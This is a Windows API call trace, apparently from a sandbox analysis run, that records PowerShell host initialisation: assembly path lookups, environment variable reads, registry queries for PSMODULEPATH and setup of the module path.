	[0543.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0544.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0544.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0544.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0544.161] CoTaskMemAlloc (cb=0x804) returned 0x1b7c9080
	[0544.161] GetConsoleTitleW (in: lpConsoleTitle=0x1b7c9080, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0544.161] CoTaskMemFree (pv=0x1b7c9080) 
	[0545.264] CoTaskMemAlloc (cb=0x804) returned 0x1b7c9930
	[0545.264] GetConsoleTitleW (in: lpConsoleTitle=0x1b7c9930, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0545.265] CoTaskMemFree (pv=0x1b7c9930) 
	[0545.265] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0545.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0545.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0545.267] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0550.391] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0550.391] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0550.391] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0550.392] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0552.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0552.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0552.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0552.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0552.308] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0552.308] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0552.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0552.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0552.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0552.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0556.813] SetConsoleCtrlHandler (HandlerRoutine=0x27968dc, Add=1) returned 1
	[0556.835] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x318
	[0556.836] CoCreateGuid (in: pguid=0x22dab0 | out: pguid=0x22dab0*(Data1=0xb6165a90, Data2=0x5acc, Data3=0x428c, Data4=([0]=0x92, [1]=0x11, [2]=0xb4, [3]=0xc5, [4]=0x32, [5]=0x7e, [6]=0xfa, [7]=0x9))) returned 0x0
	[0556.837] CoTaskMemAlloc (cb=0x104) returned 0x38e960
	[0556.837] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0556.838] CoTaskMemFree (pv=0x38e960) 
	[0556.841] WinSqmIsOptedIn () returned 0x0
	[0556.841] CoTaskMemAlloc (cb=0x104) returned 0x38e960
	[0556.841] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0556.842] CoTaskMemFree (pv=0x38e960) 
	[0556.842] CoTaskMemAlloc (cb=0x104) returned 0x38e960
	[0556.842] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0556.842] CoTaskMemFree (pv=0x38e960) 
	[0556.843] CoTaskMemAlloc (cb=0x104) returned 0x38e960
	[0556.843] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0556.843] CoTaskMemFree (pv=0x38e960) 
	[0556.843] CoTaskMemAlloc (cb=0x104) returned 0x38e960
	[0556.843] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0556.843] CoTaskMemFree (pv=0x38e960) 
	[0556.844] CoTaskMemAlloc (cb=0x104) returned 0x38e960
	[0556.844] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0556.844] CoTaskMemFree (pv=0x38e960) 
	[0558.588] CoTaskMemAlloc (cb=0x104) returned 0x38e960
	[0558.588] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0558.588] CoTaskMemFree (pv=0x38e960) 
	[0558.589] CoTaskMemAlloc (cb=0x104) returned 0x38e960
	[0558.589] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0558.589] CoTaskMemFree (pv=0x38e960) 
	[0558.589] CoTaskMemAlloc (cb=0x104) returned 0x38e960
	[0558.589] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0558.590] CoTaskMemFree (pv=0x38e960) 
	[0558.592] CoTaskMemAlloc (cb=0x104) returned 0x38e960
	[0558.592] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0558.592] CoTaskMemFree (pv=0x38e960) 
	[0558.596] CoTaskMemAlloc (cb=0x104) returned 0x38e960
	[0558.596] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0558.596] CoTaskMemFree (pv=0x38e960) 
	[0558.596] CoTaskMemAlloc (cb=0x104) returned 0x38e960
	[0558.596] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0558.596] CoTaskMemFree (pv=0x38e960) 
	[0558.597] CoTaskMemAlloc (cb=0x104) returned 0x38e960
	[0558.597] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0558.597] CoTaskMemFree (pv=0x38e960) 
	[0563.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22cf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0563.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0563.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0563.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22cf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0563.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0563.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0563.554] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22cf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0563.554] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0563.554] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0563.554] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22cf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0563.554] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0563.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0563.557] CoTaskMemAlloc (cb=0x104) returned 0x38e960
	[0563.557] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x38e960, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0563.557] CoTaskMemFree (pv=0x38e960) 
	[0563.558] CoTaskMemAlloc (cb=0xcc) returned 0x1b7cb870
	[0563.558] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b7cb870, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0563.559] CoTaskMemFree (pv=0x1b7cb870) 
	[0563.559] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d628 | out: phkResult=0x22d628*=0x31c) returned 0x0
	[0563.559] RegQueryValueExW (in: hKey=0x31c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x22d5ac, lpData=0x0, lpcbData=0x22d5a8*=0x0 | out: lpType=0x22d5ac*=0x2, lpData=0x0, lpcbData=0x22d5a8*=0x6c) returned 0x0
	[0563.559] CoTaskMemAlloc (cb=0x70) returned 0x362720
	[0563.559] RegQueryValueExW (in: hKey=0x31c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x22d57c, lpData=0x362720, lpcbData=0x22d578*=0x6c | out: lpType=0x22d57c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x22d578*=0x6c) returned 0x0
	[0563.559] CoTaskMemFree (pv=0x362720) 
	[0563.559] CoTaskMemAlloc (cb=0xcc) returned 0x1b7cb870
	[0563.559] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1b7cb870, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0563.559] CoTaskMemFree (pv=0x1b7cb870) 
	[0563.559] CoTaskMemAlloc (cb=0xcc) returned 0x1b7cb870
	[0563.559] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b7cb870, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0563.559] CoTaskMemFree (pv=0x1b7cb870) 
	[0563.562] RegCloseKey (hKey=0x31c) returned 0x0
	[0563.562] CoTaskMemAlloc (cb=0xcc) returned 0x1b7cb870
	[0563.562] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b7cb870, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0563.562] CoTaskMemFree (pv=0x1b7cb870) 
	[0563.562] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d628 | out: phkResult=0x22d628*=0x31c) returned 0x0
	[0563.563] RegQueryValueExW (in: hKey=0x31c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x22d5ac, lpData=0x0, lpcbData=0x22d5a8*=0x0 | out: lpType=0x22d5ac*=0x0, lpData=0x0, lpcbData=0x22d5a8*=0x0) returned 0x2
	[0563.563] RegCloseKey (hKey=0x31c) returned 0x0
	[0563.565] CoTaskMemAlloc (cb=0x20c) returned 0x3b8b60
	[0563.565] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x3b8b60 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0563.567] CoTaskMemFree (pv=0x3b8b60) 
	[0563.567] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x22d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0563.568] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0563.572] CoTaskMemAlloc (cb=0x104) returned 0x38e960
	[0563.573] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0563.573] CoTaskMemFree (pv=0x38e960) 
	[0563.574] CoTaskMemAlloc (cb=0x104) returned 0x38e960
	[0563.574] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0563.574] CoTaskMemFree (pv=0x38e960) 
	[0564.902] CoTaskMemAlloc (cb=0x104) returned 0x38e960
	[0564.902] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0564.902] CoTaskMemFree (pv=0x38e960) 
	[0564.902] CoTaskMemAlloc (cb=0x104) returned 0x38e960
	[0564.902] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0564.902] CoTaskMemFree (pv=0x38e960) 
	[0564.908] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d418 | out: phkResult=0x22d418*=0x324) returned 0x0
	[0564.908] RegQueryValueExW (in: hKey=0x324, lpValueName="path", lpReserved=0x0, lpType=0x22d42c, lpData=0x0, lpcbData=0x22d428*=0x0 | out: lpType=0x22d42c*=0x1, lpData=0x0, lpcbData=0x22d428*=0x74) returned 0x0
	[0564.909] RegQueryValueExW (in: hKey=0x324, lpValueName="path", lpReserved=0x0, lpType=0x22d39c, lpData=0x0, lpcbData=0x22d398*=0x0 | out: lpType=0x22d39c*=0x1, lpData=0x0, lpcbData=0x22d398*=0x74) returned 0x0
	[0564.909] CoTaskMemAlloc (cb=0x78) returned 0x362720
	[0564.909] RegQueryValueExW (in: hKey=0x324, lpValueName="path", lpReserved=0x0, lpType=0x22d36c, lpData=0x362720, lpcbData=0x22d368*=0x74 | out: lpType=0x22d36c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x22d368*=0x74) returned 0x0
	[0564.909] CoTaskMemFree (pv=0x362720) 
	[0564.909] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x22d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0564.909] SetErrorMode (uMode=0x1) returned 0x1
	[0564.909] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x22d2f0 | out: lpFileInformation=0x22d2f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0564.909] SetErrorMode (uMode=0x1) returned 0x1
	[0564.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x22d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0564.910] SetErrorMode (uMode=0x1) returned 0x1
